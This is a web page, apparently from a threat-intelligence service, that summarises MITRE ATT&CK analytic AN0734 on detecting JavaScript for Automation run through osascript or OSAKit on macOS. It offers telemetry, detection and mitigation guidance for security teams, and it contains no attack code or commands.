AN0734: Analytic 0734
Detects JavaScript for Automation (JXA) via osascript or compiled scripts using OSAKit APIs. Flags execution involving system modification, inter-process scripting, or browser abuse.
Analyst context for executives and security teams
This analytic matters because JavaScript for Automation on macOS can turn a normal scripting feature into a way to modify the system, drive other applications, or interact with browsers. For leaders, the value is not assuming “macOS scripting” is harmless: coverage depends on whether the organization can see osascript activity, compiled script execution, and OSAKit-related behavior well enough to support SOC triage and incident response decisions.
Executive priority
Prioritize this as a macOS visibility and response-readiness question. Security leaders should ask whether managed detection, endpoint logging, and incident response playbooks can distinguish legitimate automation from suspicious JXA behavior involving system modification, inter-process scripting, or browser abuse. This is especially relevant for organizations with material macOS fleets, privileged user workstations, developer systems, or compliance requirements that depend on demonstrable endpoint monitoring.
Technical view
The supplied ATT&CK analytic is for macOS and focuses on detecting JXA through osascript or compiled scripts using OSAKit APIs. SOC and detection teams should validate whether endpoint telemetry captures process execution for osascript, script or compiled-script launch context, parent/child process relationships, command-line or script indicators where available, and application automation behavior. Because no official detection logic is provided, teams should treat this as a detection-engineering requirement rather than a ready-made rule.
Likely telemetry
- macOS process execution telemetry, especially osascript invocation
- Parent and child process relationships around scripting activity
- Command-line arguments or script execution metadata where collected
- Endpoint security events showing system modification attempts
- Inter-process scripting or application automation events where available
Detection direction
- Validate visibility for both osascript-based JXA and compiled scripts using OSAKit APIs; coverage of only command-line osascript may miss compiled-script cases.
- Tune around behavior described by the analytic: system modification, inter-process scripting, and browser abuse, rather than alerting on all automation equally.
- Establish baselines for legitimate macOS automation used by IT, administrators, developers, and business workflows to reduce false positives.
- Correlate script execution with unusual parent processes, unexpected user context, sensitive application interaction, or system-change activity.
- Document telemetry gaps explicitly, since the ATT&CK object does not provide official detection logic or tactic mapping.
Mitigation priorities
- Inventory legitimate macOS automation use so defenders know what should be allowed, monitored, or investigated.
- Ensure endpoint monitoring is deployed and configured to capture relevant macOS process and script execution evidence.
- Restrict unnecessary scripting and automation privileges where operationally feasible, especially on high-value workstations.
- Prepare IR triage steps for suspicious JXA, including review of process lineage, executed script context, affected applications, and system changes.
- Use the analytic as compliance evidence only after validating local telemetry and alert handling, not merely because the ATT&CK analytic exists.
Analyst notes and limits
This is a detection analytic, not a technique description. The official description is specific to macOS JXA detection via osascript or compiled scripts using OSAKit APIs, with suspicious themes of system modification, inter-process scripting, and browser abuse. No relationship context, aliases, labels, or tactic mappings were supplied.
Official detection logic was not provided, and no relationships were supplied. This take therefore cannot assert specific ATT&CK techniques, adversary use, active exploitation, impact, or guaranteed detection coverage. Local macOS fleet composition, logging configuration, and legitimate automation patterns are required to operationalize it.
Analytic 0734
Detects JavaScript for Automation (JXA) via osascript or compiled scripts using OSAKit APIs. Flags execution involving system modification, inter-process scripting, or browser abuse.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 6120619ab939… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0734Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.